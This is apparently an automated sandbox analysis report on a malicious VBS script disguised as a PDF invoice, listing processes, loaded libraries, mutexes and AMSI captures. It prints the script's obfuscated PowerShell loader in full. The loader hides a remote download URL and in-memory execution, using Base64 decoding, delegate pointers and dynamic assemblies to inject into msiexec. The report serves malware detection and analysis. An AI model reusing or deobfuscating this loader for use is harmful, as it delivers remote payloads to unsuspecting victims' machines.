              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-WDQFG0
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8044:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ksokqut4.z4a.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\18000012550_20240930_0078864246#U00b7pdf.vbs"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7796
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8036
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbs ReversingLabs: Detection: 13%
              Source: 18000012550_20240930_0078864246#U00b7pdf.vbs Virustotal: Detection: 8%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo 
ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$S
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;$Unvicarious156=$host.PrivateData;If ($Unvicarious156) {$Sanitetsartikel++;}function Rundholts($Affectationist){$Blasfemiernes=$Hittebarnets+$Affectationist.Length-$Sanitetsartikel;for( $Fastendes=5;$Fastendes -lt $Blasfemiernes;$Fastendes+=6){$Composersatserne+=$Affectationist[$Fastendes];}$Composersatserne;}function Katedres($threadlike){ . ($Absoluthed) ($threadlike);}$Oxyhemocyanin=Rundholts 'Pa opMRach oBarnez ormi Con lPtolel SyntaCompo/Nonse5 Rheo.Netw 0 Opsi Tvanm(,lyveWUnembib,eotn PasadPostcoOu,dew Unars Dagb MussoNDvaleTNymp. Spros1Alp n0A ton.Ji ga0Runds; Myel LandiWMalniiL thonUnmud6Pr,se4 Spek;Tilba UdloexSyste6 anne4Ignor; Unig RejmrGoalpv awki: arto1Maale2dogto1Pupil.Outbl0Sem h)Sl,ms Shr wGBredleNdhavcd uidk runco,aser/P.wer2Cenes0Milje1Talle0Sikke0 Dybt1Over 0 brun1Mi ia nonreFServiiTomborUf gleudsmyfTormeo BathxSamle/Gdann1Till 2Blemi1Stipe.Bookn0Sgete ';$Paahngsmotors=Rundholts 'Ci.aruTrv eSR.cereApostr.amme-EvaluaVoka g TurgEPerboNRedisTPhyto ';$Sympatisrers=Rundholts 'AboithUdp,ntSmaratXanthpfuldbsG dro:P aco/sc ot/Besind uachrHvidei OpulvNo pheAflas.Hy,ergInforo HurkoStoregLabill bilre s lv.Pteroc RytmoPiddlm Bi l/Sporvu AnaccIndre?DataoeSti fxmaterp Yde oOpgavrFalsktSwap = lyndPlasho SupewR.petnGrofelTj lko EcodaSkriddAmuei&.orsgiK ssedR sso= Inde1Inse 6u,stoKSubbrU Ha,pqS.rimagloosQRegel_GenneXsuper6Lodgiz S,urb ysfuB ImpuHMu,tiAConteGV nstN I manKredis Stude Da.awurdypu B les.ilatwForedUBawdsAVerbaZHjttax Kloat Pr.cxSolodG Ballv Fags7 Papn ';$afrimninger=Rundholts ' dies> Iamb ';$Absoluthed=Rundholts 'IndadiRekruEDissex Gyro ';$Fastendesnconsultable='Misappropriating';$Newfangle='\Forsvarsministers.Sca';Katedres (Rundholts 'Rbest$TienngLetmelKonomo 
ubcubTrommaSlugglGaade:OvermMJewbiiEarlilSdmeflTr,ppiGrilloLodren fmateBysterPrivi=Toupe$ AsseeRotatnTrustvHelv :FasefaHoa.cp .apip diurdStaala.alketDietha Manu+Datak$H terNOutbleUd,paw dis.f Scamast genRep.igLse.al Crabe Prel ');Katedres (Rundholts 'Grnse$Sinu gS.blel.estaoSamarbRefuea Min lSema.:Va.soPStro aSkalklTechnaSkrabvAtomveRigsgrGal.eeRema,sBi al=Hornb$IriziSTestiyReim,mUnm sp oddvave,rttSociaiUnsubs Indlr UdbreErfarrFolkesAlter.Shrins Ag.rpBild,lBrugsi Fllet Gge (Hjemk$ SperaPuslifInt rr SprgiEn.anmHusbenFatheiRicarnSkandg shareSt,icrOverr)Di mi ');Katedres (Rundholts 'Kn wf[ForthN Sygee o tptDisbu.MetalS SkriesmartrJalo,vTiptiiHarpwc Vikte,welfPDermaoTidsbi MalcnMonotttrollM F,aaa Shign Ste aFllesgUdvaneNivelr Sawe]Tkked: Molm:Trak,SUnseneForincKissiuRefelrLustri Artht Noncy RustPTankvrBogstoBo ettArrecoNonh cIsfl.oVraiclPhyl Ch ff=Preco Apath[AnmelNYdedeeOdysstSynus.BesnaSAcclaeAlbsrcSidesuCircur hotoiA.sistTvangyUdmunPStaderHo lioGeno,t F,sioKo,doct.lesoHybrilIndbiTNormay TranpLondoeSwitc]kinet:Rimes: UnreT ancl impesRoolu1Vault2 ,kri ');$SJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: rstrtmgr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: comsvcs.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cmlua.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: cmutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textshaping.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: textinputframework.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coreuicomponents.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: coremessaging.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocHandler32 source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: nt.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E75000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.1838938605.0000000006E0D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb& source: powershell.exe, 00000004.00000002.1838938605.0000000006E89000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "<#Akaniaceae Herefords Skifertavles #>;$Tennisalbue='Landgrnse';<#tallerkenret Gravkers Bandonion #>;", "0")
              Source: Yara match File source: 00000004.00000002.1850125168.000000000B27C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.1849801435.0000000008250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.1533232702.00000291902A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.1830090087.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tilbagevisningerne)$global:Patronise = [System.Text.Encoding]::ASCII.GetString($Smokes)$global:Jomsviking=$Patronise.substring($Suffragette,$Fljl)<#Perspirable Batikfarvningerne Caye
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((spgende $Myel $epiteters), (Unstaged @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:skaberglden = [AppDomain]::CurrentDomain.GetAssemblies()$global:Prdisp
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Dendrologiens)), $Digitalissens).DefineDynamicModule($Epibatholithic, $false).DefineType($Loupe, $Unbooklearned, [System.MulticastDele
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Tilbagevisningerne)$global:Patronise = [System.Text.Encoding]::ASCII.GetString($Smokes)$global:Jomsviking=$Patronise.substring($Suffragette,$Fljl)<#Perspirable Batikfarvningerne Caye
